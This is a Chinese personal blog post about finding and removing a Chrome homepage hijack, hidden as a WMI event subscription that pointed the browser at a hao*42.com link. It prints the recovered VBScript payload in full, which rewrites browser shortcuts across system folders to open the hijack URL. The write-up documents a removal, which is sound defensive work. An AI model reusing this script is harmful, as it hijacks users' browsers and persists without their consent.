Chrome被hao*42.com等恶意链接劫持真正解决方法

 事情发生在昨天发现谷歌的Chrome浏览器的快捷

方式不见了,会不会是被某某安全软件给删除了,因

为此软件有一次跳出来好几个提示lnk结尾的文件

需要清理,我看了一下就按下了“一键清理”。删除

就删除,我重新建一个快捷键就可以了,前几天因

为要处理一个电脑问题,在本机上查看好多资料和

工具,下载后安装,难免会有几个软件会改浏览器

的首页,但这次不同了,打开谷歌浏览器chrome

突然发现它被http://hao*42.com/?r=b&m=e10

的主页地址给劫持绑定了,改Chrome设置也没
 
用,改注册表无效,居然查找不到。最后chrome
 
快捷方式后面的这个http://hao*42.com/?
 
r=b&m=e10地址去掉,加只读和隐藏属性,以为这
 
样子就搞定了,结果几分钟后再次打开Chrome,
 
又是http://hao*42.com/?r=b&m=e10的地址。
 
 
怎么办呢!只有上网请教百度了,网上找了很多方
 
法,除了改名,其它的方法都不行,功夫不负有心
 
人,最后终于在csdn.net上找到了方法,跟我的问
 
 
十分相似,略有不同。此资料说这应该是一个通过
 
WMI发起的定时自动运行脚本。要查看WMI事件,
 
到以下地址下载WMITool并安装(

此软件有一定的副作用,请慎用,反正我是皮试通过:)
 
链接:http://pan.baidu.com/s/1hrO5T32 密码:s69f
 
安装后打开WMI event viewer,点击左上角regist
 
er for events,弹出Connect to namespace框,填
 
入“root\subscription”,(或者默认的那个进
 
去/root/CIMV2)确定,出现下图:
 
 
 
 
 
(下面是我复制出来的script Text里的Value值,看
 
到亮点了吗,好家伙,终于被找到了!
On Error Resume Next:Const link = "http://hao*42.com/?r=b&m=e10":Const link360 = "http://hao*42.com/?r=b&m=e10&s=3":browsers = "114ie.exe,115chrome.exe,1616browser.exe,2345chrome.exe,2345explorer.exe,360se.exe,360chrome.exe,avant.exe,baidubrowser.exe,chgreenbrowser.exe,chrome.exe,firefox.exe,greenbrowser.exe,iexplore.exe,juzi.exe,kbrowser.exe,launcher.exe,liebao.exe,maxthon.exe,niuniubrowser.exe,qqbrowser.exe,sogouexplorer.exe,srie.exe,tango3.exe,theworld.exe,tiantian.exe,twchrome.exe,ucbrowser.exe,webgamegt.exe,xbrowser.exe,xttbrowser.exe,yidian.exe,yyexplorer.exe":lnkpaths = "C:\Users\Public\Desktop,C:\ProgramData\Microsoft\Windows\Start Menu\Programs,C:\Users\Administrator\Desktop,C:\Users\Administrator\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch,C:\Users\Administrator\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\StartMenu,C:\Users\Administrator\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar,C:\Users\Administrator\AppData\Roaming\Microsoft\Windows\Start Menu\Programs":browsersArr = split(browsers,","):Set oDic = CreateObject("scripting.dictionary"):For Each browser In browsersArr:oDic.Add LCase(browser), browser:Next:lnkpathsArr = split(lnkpaths,","):Set oFolders = CreateObject("scripting.dictionary"):For Each lnkpath In lnkpathsArr:oFolders.Add lnkpath, lnkpath:Next:Set fso = CreateObject("Scripting.Filesystemobject"):Set WshShell = CreateObject("Wscript.Shell"):For Each oFolder In oFolders:If fso.FolderExists(oFolder) Then:For Each file In fso.GetFolder(oFolder).Files:If LCase(fso.GetExtensionName(file.Path)) = "lnk" Then:Set oShellLink = WshShell.CreateShortcut(file.Path):path = oShellLink.TargetPath:name = fso.GetBaseName(path) & "." & fso.GetExtensionName(path):If oDic.Exists(LCase(name)) Then:If LCase(name) = LCase("360se.exe") Then:oShellLink.Arguments = link360:Else:oShellLink.Arguments = link:End If:If file.Attributes And 1 Then:file.Attributes = file.Attributes - 1:End If:oShellLink.Save:End If:End If:Next:End If:Next:

最后清除方法:在WMI event viewer中将这个项目右键删除!一开始我也抱着试试看的
 
心态去尝试,结果成功了!本文参考了 作者不应
 
有的淡定 写的文章:
 
 
 
 
 
 
 

 



[本日志由 admin 于 2019-12-26 09:21 PM 编辑]
文章来自: 本站原创
引用通告: 查看所有引用 | 我要引用此文章
Tags:
相关日志:
评论: 0 | 引用: 0 | 查看次数: 94
发表评论
昵 称:
密 码: 游客发言不需要密码.
邮 箱: 支持Gravatar头像.
网 址: 输入网址便于回访.
内 容:
验证码:
选 项:
虽然发表评论不用注册,但是为了保护您的发言权,建议您注册帐号.
字数限制 1000 字 | UBB代码 开启 | [img]标签 关闭